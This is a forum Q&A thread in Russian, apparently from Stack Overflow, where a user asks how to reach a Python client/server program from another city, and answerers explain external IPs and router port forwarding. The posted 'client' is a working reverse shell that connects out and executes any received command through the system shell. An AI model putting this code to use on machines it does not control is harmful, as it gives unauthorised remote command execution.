# Как удаленно подключиться (Python)

Tags: python, сервер, client, remote

Есть код сервера и клиента
Все работает хорошо, но программа работает только по локальной сети если пытаюсь удаленно с другого города, то она не работает.
Не знаю какой ip надо вводить для сервера, чтобы ко мне могли подключиться удаленно

Это клиентская часть

```
import subprocess
import socket
import os 

def execute_command(command):
    return subprocess.check_output(command, shell=True)

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect(('192.168.0.15', 8888))

while True:
    command = connection.recv(1024)
    command_result = execute_command(command)
    connection.send(command_result)

connection.close()
```

Серверная часть

```
import subprocess
import socket
import os 
listner = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listner.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listner.bind(('192.168.0.15', 8888))
listner.listen(0)
print("[+] Waiting for connection")
connection, address = listner.accept()
print("[+] Connection established - " + str(address))
while True:
    command = raw_input("----> ")
    connection.send(command)
    result = connection.recv(1024)
    print(result)
```

Comment: Рекомендую почитать вопрос и ответ: https://ru.stackoverflow.com/q/1135843/324059.

Answer (score 1):

Обычно интернет приходит в роутер и роутер виден из внешней сети как адрес. Чтобы узнать адрес вашего роутера вне дома, зайдите, например, на `https://2ip.ru/`

Так вы узнаете внешний адрес вместо `192.168.0.15`

Далее вам нужно подключиться к роутеру ( обычно это просто ввести в браузере адрес роутера, адрес роутера написан на нём снизу, например, `192.168.0.1` ), ввести логин и пароль доступа и настроить *проброс портов*.

Проброс порта, например, 8888. Когда к вам приходит со стороны пользователь и стучится в ваш роутер в дверь номер 8888, то ваш роутер должен знать, на какой комп в вашей сети посылать этого пользователя, потому что у вас в сети много компов и роутер не знает где именно расположена серверная часть.

Поэтому, вы добавляете в роутер информацию вида, `внешний адрес любой порт = 192.168.0.15 8888`. Внешний порт может быть любым, главное объяснить роутеру, куда послать гостя, если он постучится из вне.

Это приблизительное объяснение, если что не ясно - пишите, попробую рассказать

Comment: Это всё при условии, что провайдер предоставляет внешний ip-адрес конкретно для Вашего маршрутизатора.

Comment: Верно, нужно позвонить провайдеру и уточнить этот вопрос

Comment: Вот вставил внешний ip теперь даже не могу прослушивать 
File "/home/c0mrade/Документы/Programming/Trash/client.py", line 6, in <module>
    listner.bind(('93.90.87.254', 8888))
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 99] Cannot assign requested address

Comment: @Reese_c0mrade нет, вы меня не так поняли, у вас сервер как слушал адрес ```'192.168.0.15'``` так и продолжает слушать. Схема такая ```Серверная часть 192.168.0.15 <- роутер <- Клиентская часть 93.90.87.254```. И если вы не объяснили роутеру что делать с запросами на порт 8888, то ваш сигнал просто не пройдёт. Вы почитали как у вашего роутера пробросить порт ?

Comment: Можете отредачить мой код и скинуть?
Буду благодарен

Comment: @Reese_c0mrade к сожалению нет, код зависит от вашего окружения и то что работает у вас не будет работать у меня. Кроме того, я не пишу на питоне, я постарался объяснить в чём суть проблемы